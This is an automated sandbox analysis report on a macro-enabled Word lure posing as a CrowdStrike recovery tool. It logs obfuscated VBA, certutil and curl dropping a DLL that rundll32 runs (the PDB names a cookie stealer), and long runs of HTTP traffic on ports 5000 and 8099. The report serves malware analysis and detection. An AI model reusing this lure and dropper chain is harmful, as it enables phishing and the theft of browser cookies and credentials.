Source: C:\Users\user\AppData\Local\Temp\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Templates.LNK.0.dr	LNK file: ..\..\Templates
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr	LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0000.tmp.26.dr	Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp

Source: Element design set.dotx.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Name: ThisDocument

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

13_2_0087D33A

PE file contains sections with non-standard names

Source: mscorsvc.dll.14.dr

Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92C4A381 push rdx; ret

16_2_00007FFD92C4A38B

Drops PE files

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Users\user\AppData\Local\Temp\curl.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\certutil.exe	File created: C:\Users\user\AppData\Local\Temp\mscorsvc.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknown	Network traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknown	Network traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknown	Network traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknown	Network traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknown	Network traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknown	Network traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknown	Network traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 5000
